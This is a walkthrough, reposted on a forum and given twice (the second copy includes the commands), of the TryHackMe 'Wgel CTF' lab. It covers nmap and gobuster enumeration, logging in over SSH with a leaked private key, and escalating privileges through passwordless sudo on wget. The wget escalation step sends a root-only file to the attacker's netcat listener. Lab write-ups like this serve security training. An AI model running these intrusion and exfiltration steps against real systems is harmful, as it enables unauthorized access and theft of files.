Çağrı Ali Ceylan tarafından yazılmıştır.
Hello everyone, in this article we will be solving the room named Wgel CTF in TryHackMe.
Let’s Start!
First we perform an aggressive nmap scan, nmap is an information gathering tool that we can collect active information about the network.
nmap
We have 2 open ports, one is port 80 and the other is port 22. There is one website standing on the port 80, and ssh service is standing on port 22. We will go through web as it is open for everyone and then we can use the tool named gobuster to search directories.
gobuster
We found one directory, we cannot find much in the sitemap directory, so we are doing a directory scan in the sitemap directory.
And yes! We found a ssh key.
gobuster2
However, we can log in, but we need a username. For this, when we look at the source code of the site, we see a text like this;
source code
Based on this text, we understand that the user’s name is “Jessie”, we will now connect to the ssh. Before connecting, we need to define certain permissions for the id_rsa file, we can define it as follows.
Let’s connect to the ssh now.
And yes we are in!
ssh
When we search the directories inside, we see that the user flag is in the document directory, we can use cat or less tools to read the flag. Anyway, let’s look at the flag.
user_flag.txt
Now we need to increase our privilege, so we need to first look at where the administrator privileges are needed, we can use the following command.
sudo-l
When we look at the output of the command, we see that we can be an administrator at/usr/bin/wget without a password, we can exploit it. You can use the detailed resource for abuse here: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/. Now let’s exploit our machine by entering the command given there.
First, we need to listen to our own computer with netcat.
Now let’s enter the following command on the opposite machine, you must enter the ip that tryhackme defined you in the part where the ip address is written.
Flag
Since we are using the wget directory here, the machine did not ask us for a password while getting administrator permission, now has it given us any reaction by going to the terminal tab where we are listening with netcat? Let’s have a look. Yes he did! The value of our administrator flag is in front of us, let’s enter the flag and finish the machine.
root_flag.txt
You can follow our website for more content!
https://pwnlab.me/category/walkthrough/
[EN] TryHackMe Wgel CTF Writeup
Hello everyone, in this article we will be solving the room named Wgel CTF in TryHackMe.
Let’s Start!
First we perform an aggressive nmap scan, nmap is an information gathering tool that we can collect active information about the network.
nmap -A 10.10.213.167
nmap
We have 2 open ports, one is port 80 and the other is port 22. There is one website standing on the port 80, and ssh service is standing on port 22. We will go through web as it is open for everyone and then we can use the tool named gobuster to search directories.
gobuster dir -u http://10.10.213.167/ -w common.txt
gobuster
We found one directory, we cannot find much in the sitemap directory, so we are doing a directory scan in the sitemap directory.
gobuster dir -u http://10.10.213.167/sitemap -w common.txt
And yes! We found a ssh key.
gobuster2
However, we can log in, but we need a username. For this, when we look at the source code of the site, we see a text like this;
<!– Jessie don’t forget to udate the webiste –>
source code
Based on this text, we understand that the user’s name is “Jessie”, we will now connect to the ssh. Before connecting, we need to define certain permissions for the id_rsa file, we can define it as follows.
chmod 600 id_rsa
Let’s connect to the ssh now.
ssh -i id_rsa [email protected]
And yes we are in!
ssh
When we search the directories inside, we see that the user flag is in the document directory, we can use cat or less tools to read the flag. Anyway, let’s look at the flag.
cd Documents
cat user_flag.txt
less user_flag.txt (alternative)
user_flag.txt
Now we need to increase our privilege, so we need to first look at where the administrator privileges are needed, we can use the following command.
sudo -l
sudo-l
When we look at the output of the command, we see that we can be an administrator at/usr/bin/wget without a password, we can exploit it. You can use the detailed resource for abuse here: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/. Now let’s exploit our machine by entering the command given there.
First, we need to listen to our own computer with netcat.
nc -lvnp 5050
Now let’s enter the following command on the opposite machine, you must enter the ip that tryhackme defined you in the part where the ip address is written.
sudo /usr/bin/wget –post-fi
le=/root/root_flag.txt 10.9.30.197:5050
Flag
Since we are using the wget directory here, the machine did not ask us for a password while getting administrator permission, now has it given us any reaction by going to the terminal tab where we are listening with netcat? Let’s have a look. Yes he did! The value of our administrator flag is in front of us, let’s enter the flag and finish the machine.
root_flag.txt
You can follow our website for more content!
https://pwnlab.me/category/walkthrough/
Moderatör tarafında düzenlendi: